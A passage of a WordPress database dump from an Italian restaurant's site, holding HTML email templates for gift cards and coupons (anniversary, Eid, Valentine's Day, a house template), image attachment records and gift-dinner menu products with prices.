text-align: right; width: 100%; display: inline-block; vertical-align: top;\">To- </span> <span style=\"color: #535151; font-size: 14px; width: 180px; float: left; vertical-align: top;\">[TO]</span></td></tr><tr><td style=\"padding: 5px 10px; word-wrap: break-word;\"><span style=\"color: #8a2814; font-size: 23.96px; vertical-align: top;\"><strong>[AMOUNT]/-</strong> </span></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr><td bgcolor=\"#e95261\"><table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"padding: 10px 30px; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #ffffff;\"><p style=\"font-weight: bold; text-align: center;\">[DISCLAIMER]</p></td></tr></tbody></table></td></tr></tbody></table></center><style>@media screen and (max-width: 600px){.email-container{width: 100% !important; margin: auto !important;}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */ .fluid{max-width: 90% !important; height: auto !important; margin-left: auto !important; margin-right: auto !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */ .center-on-narrow{text-align: center !important; display: block !important; margin-left: auto !important; margin-right: auto !important; float: none !important;}table.center-on-narrow{display: inline-block !important;}}@media screen and (max-width: 476px){/* What it does: Forces table cells into full-width rows. */ .stack-column, .stack-column-center{display: block !important; width: 100% !important; max-width: 100% !important; direction: ltr !important;}/* And center justify these ones. */ .stack-column-center{text-align: center !important;}}</style>','Happy Anniversary','','publish','closed','closed','','happy-anniversary-2','','','2017-07-11 09:39:37','2017-07-11 07:39:37','',0,'http://www.ristorantesolymar.it/giftcard/happy-anniversary-2/',0,'giftcard','',0),(464,1,'2017-07-11 09:39:37','2017-07-11 07:39:37','<center style=\"width: 100%;\"><div style=\"display: none; font-size: 1px; line-height: 1px; max-height: 0px; max-width: 0px; opacity: 0; overflow: hidden; mso-hide: all; font-family: sans-serif;\">(Optional) This text will appear in the inbox preview, but not the email body.</div><table class=\"email-container\" style=\"margin: auto;\" border=\"0\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td style=\"text-align: center; background: #0e0149;\"><p style=\"color: #0e0149; font-size: 25px; font-family: sans-serif; margin: 0px; text-align: left;\"><strong>[LOGO]</strong></p></td></tr></tbody></table><table class=\"email-container\" style=\"margin: auto;\" border=\"0\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td style=\"padding-bottom: 0px;\" bgcolor=\"#f6f6f6\"><span class=\"feature_img\">[FEATUREDIMAGE]</span></td></tr><tr><td style=\"padding: 30px; text-align: center; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; color: #555555;\" bgcolor=\"#d6ccfd\"></td></tr><tr style=\"background-color: #0e0149;\"><td style=\"color: #fff; font-size: 20px; letter-spacing: 0px; margin: 0; text-transform: uppercase; background-color: #0e0149; padding: 20px 10px; line-height: 0;\"><p style=\"border: 2px dashed #ffffff; color: #fff; font-size: 20px; letter-spacing: 0px; padding: 30px 10px; line-height: 30px; margin: 0; text-transform: uppercase; background-color: #0e0149; text-align: center;\">Coupon Code<span style=\"display: block; font-size: 25px;\">[COUPON]</span><span style=\"display: block;\">Ed:[EXPIRYDATE]</span></p></td></tr><td bgcolor=\"#d6ccfd\" style=\"padding-top: 45px; text-align: center; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; color: #555555; \"></td><tr><td dir=\"ltr\" style=\"padding-bottom: 44px;\" align=\"center\" valign=\"top\" bgcolor=\"#d7ceff\" width=\"100%\"><table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td class=\"stack-column-center\" style=\"vertical-align: top;\" width=\"50%\"><table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td dir=\"ltr\" style=\"padding: 0px 25px;\" width=\"50%\" valign=\"top\">[DEFAULTEVENT]</td></tr></tbody></table></td><td class=\"stack-column-center\" style=\"vertical-align: top;\" width=\"50%\"><table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td class=\"center-on-narrow\" dir=\"ltr\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #ffffff; padding: 0px 15px; text-align: left;\" valign=\"top\"><p style=\"font-size: 15px; line-height: 24px; text-align: justify; color: #535151; min-height: 150px; white-space: pre-line;\">[MESSAGE]</p></td></tr><tr><td class=\"mail-content\" style=\"word-wrap: break-word; font-family: sans-serif; padding: 0px 15px;\"><span style=\"color: #535151; font-size: 15px; float: left; vertical-align: top; margin-right: 2% text-align: right; display-inline: block;\">From- </span> <span style=\"color: #535151; font-size: 14px; vertical-align: top; display: inline-block; width: 180px; float: left;\">[FROM]</span></td></tr><tr><td style=\"word-wrap: break-word; font-family: sans-serif; padding: 0px 15px;\"><span style=\"color: #535151; font-size: 15px; max-width: 15%; float: left; margin-right: 2%; text-align: right; width: 100%; display: inline-block; vertical-align: top;\">To- </span> <span style=\"color: #535151; font-size: 14px; width: 180px; float: left; vertical-align: top;\">[TO]</span></td></tr><tr><td style=\"padding: 5px 10px; word-wrap: break-word;\"><span style=\"color: #0e0149; font-size: 23.96px; vertical-align: top;\"><strong>[AMOUNT]/-</strong> </span></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr><td bgcolor=\"#0e0149\"><table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"padding: 20px 30px; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #ffffff;\"><p style=\"font-weight: bold; text-align: center;\">[DISCLAIMER]</p></td></tr></tbody></table></td></tr></tbody></table></center><style>@media screen and (max-width: 600px){.email-container{width: 100% !important; margin: auto !important;}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */ .fluid{max-width: 90% !important; height: auto !important; margin-left: auto !important; margin-right: auto !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */ .center-on-narrow{text-align: center !important; display: block !important; margin-left: auto !important; margin-right: auto !important; float: none !important;}table.center-on-narrow{display: inline-block !important;}}@media screen and (max-width: 476px){/* What it does: Forces table cells into full-width rows. */ .stack-column, .stack-column-center{display: block !important; width: 100% !important; max-width: 100% !important; direction: ltr !important;}/* And center justify these ones. */ .stack-column-center{text-align: center !important;}}</style>','Happy Eid','','publish','closed','closed','','happy-eid-2','','','2017-07-11 09:39:37','2017-07-11 07:39:37','',0,'http://www.ristorantesolymar.it/giftcard/happy-eid-2/',0,'giftcard','',0),(465,1,'2017-07-11 09:39:37','2017-07-11 07:39:37','<table class=\"email-container\" style=\"margin: 0 auto;background-color: #ff9898;border-spacing: 20px\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td style=\"padding:10px\"><table class=\"email-container\" style=\"border:2px dashed #ffffff!important;margin: 0 auto;width:100%;padding:10px 0px\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td style=\"padding: 20px 0;text-align: left\"><a style=\"text-decoration: none;color: #ffffff;margin-left: 10px\">[LOGO]</a></td></tr><tr><td style=\"padding: 20px 0;text-align: center\"><span style=\"font-size: 22px;color: #ffffff;border-top: 1px solid #ffffff;border-bottom: 1px solid #ffffff;padding: 10px;font-family: Arial, Helvetica, sans-serif\">Valentine’s Day </span></td></tr><tr><td class=\"img-block\" style=\"text-align: center;padding: 20px 0px\">[FEATUREDIMAGE]</td></tr></tbody></table></td></tr></tbody></table>&nbsp;<table class=\"email-container\" style=\"margin: auto\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td style=\"text-align: center;font-family: sans-serif;font-size: 15px;line-height: 20px;color: #555555\" bgcolor=\"#ffffff\"></td></tr><tr><td style=\"text-align: center;background-color: #ffd5d5;padding:10px\" valign=\"middle\"><div><table style=\"border-spacing: 20px;border: 2px dashed #ffffff!important\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td style=\"padding:10px 0px;font-family: sans-serif;line-height: 20px;color: #ff9898;text-align: center;border: 3px\" valign=\"middle\"><h2 style=\"padding: 0px;margin:10px 0px;font-family: Arial, Helvetica, sans-serif;font-size: 15px;text-align: center\">COUPON CODE</h2><p style=\"font-size: 25px;font-weight:bold;margin:0px;text-align: center\">[COUPON]</p><span style=\"font-size: 15px;text-align: center;padding:10px 0px\">(Ed. [EXPIRYDATE])</span></td></tr></tbody></table></div></td></tr><tr><td style=\"padding: 15px\" align=\"center\" valign=\"top\" bgcolor=\"#ffffff\"><table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"stack-column-center\" style=\"vertical-align: top;width: 50%\"><table border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"padding: 10px;text-align: center;width: 50%\">[DEFAULTEVENT]</td></tr></tbody></table></td><td class=\"stack-column-center\" style=\"vertical-align: top\"><table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"100%\"><tbody><tr><td class=\"center-on-narrow\" style=\"font-family: sans-serif;font-size: 15px;line-height: 20px;color: #555555;padding: 10px;text-align: left; word-break: break-word;\"><p style=\"min-height: 180px\">[MESSAGE]</p></td></tr><tr><td style=\"padding: 0 10px;color: #373737\"><span style=\"float: left;padding: 0 3% 0 0;text-align: right\">From :</span><span style=\"width:75%;float: left; word-break: break-all;\">[FROM]</span></td></tr><tr><td style=\"padding: 5px 10px;color: #373737\"><span style=\"float: left;padding: 0 3% 0 0;text-align: right\">To :</span><span style=\"width:75%;float: left;word-break: break-all;\">[TO]</span></td></tr><tr><td style=\"padding: 5px 10px;color: #373737\"><h2 style=\"font-size: 30px;font-family: Arial, Helvetica, sans-serif\">[AMOUNT]</h2></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr><td style=\"text-align: center;padding: 15px;color: #ffffff;background-color: #ff9898;font-size: 18px;font-family: Arial, Helvetica, sans-serif\">[DISCLAIMER]</td></tr></tbody></table>','Valentine\'s Day Special 1','','publish','closed','closed','','valentines-day-special-1-2','','','2017-07-11 09:39:37','2017-07-11 07:39:37','',0,'http://www.ristorantesolymar.it/giftcard/valentines-day-special-1-2/',0,'giftcard','',0),(466,1,'2017-07-11 09:39:37','2017-07-11 07:39:37','<table class=\"email-container\" style=\"margin: auto;text-align: center ! important;background-color: #fc3f3f;width: 600px\" border=\"0\" width=\"600px\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td style=\"text-align: left;padding: 20px 10px\">[LOGO]</td></tr><tr><td style=\"padding: 30px 0px !important\">[FEATUREDIMAGE]</td></tr></tbody></table><table class=\"email-container\" style=\"margin: auto\" border=\"0\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td class=\"mwb_coupon_section\" valign=\"middle\" bgcolor=\"#fff\"><div><table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td style=\"width: 100%;text-align: center;padding: 0px 15px;font-family: sans-serif;font-size: 15px;line-height: 20px;color: #000\" valign=\"middle\"><h1 style=\"border: 2px dashed #fcd63f;text-align: center!important;padding: 33px;margin: 0;font-size: 15px;\"><p style=\"color:#fc3f3f;font-size: 16px;margin: 0px\">Coupon Code</p><p style=\"color: #fc3f3f;font-size: 18px;font-weight: bold;margin: 0px\">[COUPON]</p><p style=\"font-family: sans-serif;color: #fc3f3f;font-size: 18px;font-weight: bold;margin: 0px\">(Ed. [EXPIRYDATE] )</p></h1></td></tr></tbody></table></div></td></tr><tr><td style=\"padding: 10px\" align=\"center\" valign=\"top\" bgcolor=\"#fcd63f\"><table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"stack-column-center\" style=\"width: 50%;vertical-align: top\"><table border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"padding: 10px;text-align: center;width: 50%\">[DEFAULTEVENT]</td></tr></tbody></table></td><td class=\"stack-column-center\" style=\"width: 50%;vertical-align: top;padding: 10px\"><table width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td><p style=\"font-size: 15px;line-height: 1.5;font-family: sans-serif;min-height: 180px; word-break: break-word;\">[MESSAGE]</p></td></tr><tr><td style=\"padding: 25px 0px 0px 0px\"><span style=\"float: left;padding: 0 3% 0 0;text-align: right\"> From :</span> <span style=\"width:75%;float: left;word-break: break-all;\"> [FROM] </span></td></tr><tr><td><span style=\"float: left;padding: 0 3% 0 0;text-align: right\">To :</span> <span style=\"width:75%; word-break: break-all;float: left;\"> [TO] </span></td></tr><tr><td><h2 style=\"font-size: 30px;font-family: Arial, Helvetica, sans-serif\">[AMOUNT]</h2></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr><td bgcolor=\"#fc3f3f\"><table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"padding: 20px 0px;text-align: center;font-family: sans-serif;font-size: 15px;line-height: 20px;color: #ffffff\">[DISCLAIMER]</td></tr></tbody></table></td></tr></tbody></table>','Valentine\'s Day Special 2','','publish','closed','closed','','valentines-day-special-2-2','','','2017-07-11 09:39:37','2017-07-11 07:39:37','',0,'http://www.ristorantesolymar.it/giftcard/valentines-day-special-2-2/',0,'giftcard','',0),(467,1,'2017-07-11 09:41:21','2017-07-11 07:41:21','<center style=\"width: 100%;\">\n<div style=\"display: none; font-size: 1px; line-height: 1px; max-height: 0px; max-width: 0px; opacity: 0; overflow: hidden; mso-hide: all; font-family: sans-serif;\">(Optional) This text will appear in the inbox preview, but not the email body.</div>\n<table class=\"email-container\" style=\"margin: auto;\" role=\"presentation\" border=\"0\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\n<tbody>\n<tr>\n<td style=\"padding-top: 20px; text-align: left; padding-left: 20px; background-color: #ffffff; color: #3c64ac; font-family: sans-serif; font-weight: bold; font-size: 20px;\">[LOGO]</td>\n</tr>\n</tbody>\n</table>\n<table class=\"email-container\" style=\"margin: auto;\" role=\"presentation\" border=\"0\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\n<tbody>\n<tr>\n<td bgcolor=\"#fff\"><span class=\"feature_img\">[FEATUREDIMAGE]</span></td>\n</tr>\n<tr>\n<td style=\"background-color: #fff; padding: 20px 0;\"></td>\n</tr>\n<tr>\n<td style=\"text-align: center; font-family: sans-serif; font-size: 15px; color: #1976e7; vertical-align: middle; display: table-cell; background: #ce2a2b; padding: 5px;\">\n<h2 style=\"font-size: 16px; text-align: center!important; display: block; color: #ffffff; background: #ce2a2b none repeat scroll 0% 0%; margin: 0px; border: 2px dashed #ffffff; padding: 15px 0px;\">CODICE COUPON<span style=\"display: block; font-size: 24px; padding: 8px 0 0 0;\">[COUPON]</span> <span style=\"display: block; font-size: 16px; padding: 8px 0 0 0;\">(Scadenza:[EXPIRYDATE])</span></h2>\n</td>\n</tr>\n<tr>\n<td dir=\"ltr\" style=\"padding: 70px 10px 70px;\" align=\"center\" valign=\"top\" bgcolor=\"#ffffff\" width=\"100%\">\n<table role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\n<tbody>\n<tr>\n<td class=\"stack-column-center\" style=\"vertical-align: top;\" width=\"50%\">\n<table role=\"presentation\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\n<tbody>\n<tr>\n<td dir=\"ltr\" style=\"padding: 0 10px 0 10px;\" valign=\"top\" width=\"50%\">[DEFAULTEVENT]</td>\n</tr>\n</tbody>\n</table>\n</td>\n<td class=\"stack-column-center\" valign=\"top\" width=\"50%\">\n<table role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\n<tbody>\n<tr>\n<td class=\"center-on-narrow\" dir=\"ltr\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #000; margin: 0px; word-wrap: break-word; text-align: left;\" valign=\"top\">\n<p style=\"color: #000; font-size: 15px; min-height: 180px; height: auto; padding: 0px 0px 20px; margin: 0; text-align: left;\">[MESSAGE]</p>\n</td>\n</tr>\n<tr>\n<td class=\"center-on-narrow\" dir=\"ltr\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; word-wrap: break-word; line-height: 20px; color: #000;\" valign=\"top\">\n<p style=\"margin-bottom: 0px; font-size: 16px; text-align: left;\"><span style=\"display: inline-block; text-align: right; font-size: 15px; vertical-align: top;\">DA </span><span style=\"display: inline-block; width: 180px; text-align: left; font-size: 14px; word-wrap: break-word; vertical-align: top;\">[FROM]</span></p>\n</td>\n</tr>\n<tr>\n<td class=\"center-on-narrow\" dir=\"ltr\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; word-wrap: break-word; color: #000;\" valign=\"top\">\n<p style=\"margin-top: 0px; font-size: 16px; line-height: 25px; text-align: left;\"><span style=\"display: inline-block; text-align: right; font-size: 15px; vertical-align: top;\">PER </span><span style=\"display: inline-block; width: 180px; text-align: left; font-size: 14px; vertical-align: top;\">[TO]</span></p>\n</td>\n</tr>\n<tr>\n<td class=\"center-on-narrow\" dir=\"ltr\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; word-wrap: break-word; color: #fff;\" valign=\"top\">\n<p style=\"text-align: left; vertical-align: top; font-weight: bold; font-size: 28px;\"><span style=\"color: #c31a1a; margin: 20px 0;\">[AMOUNT]</span></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td bgcolor=\"#ce2a2b\">\n<table role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px; font-family: sans-serif; font-size: 16px; mso-height-rule: exactly; line-height: 20px; color: #fff;\">[DISCLAIMER]</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</center><style>@media screen and (max-width: 599px){.email-container{width: 100% !important;margin: auto !important;}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */.fluid{max-width: 100% !important;height: auto !important;margin-left: auto !important;margin-right: auto !important;}/* What it does: Forces table cells into full-width rows. */.stack-column,.stack-column-center{display: block !important;width: 100% !important;max-width: 100% !important;direction: ltr !important;}/* And center justify these ones. */.stack-column-center{text-align: center !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */.center-on-narrow{text-align: center !important;display: block !important;margin-left: auto !important;margin-right: auto !important;float: none !important;}table.center-on-narrow{display: inline-block !important;}}.feature_img > img{margin: 0 auto; display: block; width:100%;}</style>','President Day','','inherit','closed','closed','','453-autosave-v1','','','2017-07-11 09:41:21','2017-07-11 07:41:21','',453,'http://www.ristorantesolymar.it/2017/07/11/453-autosave-v1/',0,'revision','',0),(468,1,'2017-07-11 18:42:48','2017-07-11 16:42:48','<table class=\"email-container\" style=\"margin: 0 auto; background-color: #ff9898; border-spacing: 10px;\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 5px;\">\r\n<table class=\"email-container\" style=\"border: 2px dashed #ffffff!important; margin: 0 auto; width: 100%; padding: 10px 0px;\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 0; text-align: left;\"><a style=\"text-decoration: none; color: #ffffff; margin-left: 10px;\">[LOGO]</a></td>\r\n<td style=\"padding: 10px 0; text-align: center;\">[FEATUREDIMAGE]</td>\r\n</tr>\r\n<tr>\r\n<td class=\"img-block\" style=\"text-align: center; padding: 2px 0px;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<table class=\"email-container\" style=\"margin: auto;\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"text-align: center; font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555;\" bgcolor=\"#ffffff\"></td>\r\n</tr>\r\n<!-- -->\r\n<tr>\r\n<td style=\"padding: 15px;\" align=\"center\" valign=\"top\" bgcolor=\"#ffffff\">\r\n<table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%;\">\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px; text-align: center; width: 50%;\">[DEFAULTEVENT]</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top;\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555; padding: 10px; text-align: left; word-break: break-word;\">\r\n<p style=\"min-height: 180px;\">[MESSAGE]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 0 10px; color: #373737;\"><span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">Da :</span><span style=\"width: 75%; float: left; word-break: break-all;\">[FROM]</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\"><span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">A :</span><span style=\"width: 75%; float: left; word-break: break-all;\">[TO]</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\r\n<h3 style=\"font-size: 30px; font-family: Arial, Helvetica, sans-serif;\">[AMOUNT]</h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center; background-color: #ffd5d5; padding: 10px;\" valign=\"middle\">\r\n<div>\r\n<table style=\"border-spacing: 20px; border: 2px dashed #ffffff!important;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 0px; font-family: sans-serif; line-height: 20px; color: #ff9898; text-align: center; border: 3px;\" valign=\"middle\">\r\n<h2 style=\"padding: 0px; margin: 10px 0px; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">Codice Coupon</h2>\r\n<p style=\"font-size: 25px; font-weight: bold; margin: 0px; text-align: center;\">[COUPON]</p>\r\n<span style=\"font-size: 15px; text-align: center; padding: 10px 0px;\">(Scadenza. [EXPIRYDATE])</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center; padding: 15px; color: #ffffff; background-color: #ff9898; font-size: 18px; font-family: Arial, Helvetica, sans-serif;\">[DISCLAIMER]</td>\r\n</tr>\r\n</tbody>\r\n</table>','Template Sol Y mar','','publish','closed','closed','','template-sol-y-mar','','','2018-12-14 20:46:24','2018-12-14 19:46:24','',0,'http://www.ristorantesolymar.it/?post_type=giftcard&#038;p=468',0,'giftcard','',0),(469,1,'2017-07-11 19:10:13','2017-07-11 17:10:13','<table class=\"email-container\" style=\"margin: 0 auto; background-color: #ff9898; border-spacing: 10px;\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\n<tbody>\n<tr>\n<td style=\"padding: 5px;\">\n<table class=\"email-container\" style=\"border: 2px dashed #ffffff!important; margin: 0 auto; width: 100%; padding: 10px 0px;\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\n<tbody>\n<tr>\n<td style=\"padding: 10px 0; text-align: left;\"><a style=\"text-decoration: none; color: #ffffff; margin-left: 10px;\">[LOGO]</a></td>\n<td style=\"padding: 10px 0; text-align: right;\">\n[FEATUREDIMAGE]\n</td>\n</tr>\n<tr>\n<td class=\"img-block\" style=\"text-align: center; padding: 2px 0px;\"></td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n<table class=\"email-container\" style=\"margin: auto;\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\n<tbody>\n<tr>\n<td style=\"text-align: center; font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555;\" bgcolor=\"#ffffff\"></td>\n</tr>\n<!-- -->\n<tr>\n<td style=\"padding: 15px;\" align=\"center\" valign=\"top\" bgcolor=\"#ffffff\">\n<table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%;\">\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 10px; text-align: center; width: 50%;\">[DEFAULTEVENT]</td>\n</tr>\n</tbody>\n</table>\n</td>\n<td class=\"stack-column-center\" style=\"vertical-align: top;\">\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555; padding: 10px; text-align: left; word-break: break-word;\">\n<p style=\"min-height: 180px;\">[MESSAGE]</p>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0 10px; color: #373737;\"><span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">Da :</span><span style=\"width: 75%; float: left; word-break: break-all;\">[FROM]</span></td>\n</tr>\n<tr>\n<td style=\"padding: 5px 10px; color: #373737;\"><span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">A :</span><span style=\"width: 75%; float: left; word-break: break-all;\">[TO]</span></td>\n</tr>\n<tr>\n<td style=\"padding: 5px 10px; color: #373737;\">\n<h3 style=\"font-size: 30px; font-family: Arial, Helvetica, sans-serif;\">[AMOUNT]</h3>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n\n<tr>\n<td style=\"text-align: center; background-color: #ffd5d5; padding: 10px;\" valign=\"middle\">\n<div>\n<table style=\"border-spacing: 20px; border: 2px dashed #ffffff!important;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\n<tbody>\n<tr>\n<td style=\"padding: 10px 0px; font-family: sans-serif; line-height: 20px; color: #ff9898; text-align: center; border: 3px;\" valign=\"middle\">\n<h2 style=\"padding: 0px; margin: 10px 0px; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">Codice Coupon</h2>\n<p style=\"font-size: 25px; font-weight: bold; margin: 0px; text-align: center;\">[COUPON]</p>\n<span style=\"font-size: 15px; text-align: center; padding: 10px 0px;\">(Scadenza. [EXPIRYDATE])</span></td>\n</tr>\n</tbody>\n</table>\n</div></td>\n</tr>\n\n\n<tr>\n<td style=\"text-align: center; padding: 15px; color: #ffffff; background-color: #ff9898; font-size: 18px; font-family: Arial, Helvetica, sans-serif;\">[DISCLAIMER]</td>\n</tr>\n</tbody>\n</table>','Template Sol Y mar','','inherit','closed','closed','','468-autosave-v1','','','2017-07-11 19:10:13','2017-07-11 17:10:13','',468,'http://www.ristorantesolymar.it/2017/07/11/468-autosave-v1/',0,'revision','',0),(470,1,'2017-07-11 18:49:14','2017-07-11 16:49:14','','be-the-reason','','inherit','open','closed','','be-the-reason','','','2017-07-11 18:49:14','2017-07-11 16:49:14','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason.jpg',0,'attachment','image/jpeg',0),(471,1,'2017-07-11 18:52:59','2017-07-11 16:52:59','','do-small-thing','','inherit','open','closed','','do-small-thing','','','2017-07-11 18:52:59','2017-07-11 16:52:59','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/do-small-thing.png',0,'attachment','image/png',0),(472,1,'2017-07-11 18:56:10','2017-07-11 16:56:10','<em>Benvenuto della cucina\r\nDegustazione di antipasti\r\nUn crudo e due cotti\r\nLa pasta\r\nIl pesce\r\nDessert\r\n+ 1 bottiglia di vino\r\n+ 2 caffe’ \r\n+ 1 bottiglia d’acqua\r\nEuro 125</em>','Regala cena: Menù Creativo per 2 persone + Bevande','<em>Benvenuto della cucina\r\nDegustazione di antipasti\r\nUn crudo e due cotti\r\nLa pasta\r\nIl pesce\r\nDessert\r\n+ 1 bottiglia di vino\r\n+ 2 caffe’ \r\n+ 1 bottiglia d’acqua\r\nEuro 125</em>','publish','closed','closed','','regala-cena-menu-creativo-per-2-persone-con-bevande','','','2019-07-16 21:11:28','2019-07-16 19:11:28','',0,'http://www.ristorantesolymar.it/?post_type=product&#038;p=472',0,'product','',0),(473,1,'2017-07-11 19:15:52','2017-07-11 17:15:52','','buono','','inherit','open','closed','','buono','','','2017-07-11 19:15:52','2017-07-11 17:15:52','',468,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png',0,'attachment','image/png',0),(474,1,'2017-07-13 09:29:04','2017-07-13 07:29:04','<em>Calamari saltati con patate e bacon\r\nGamberi alla greca\r\nSpaghetto alle vongole\r\nFrittura mista e lo spiedone grigliato\r\nSorbetto\r\nEuro 93,00 (Escluso Bavande)</em>','Regala cena: Menù Storico per 2 persone','<em>Calamari 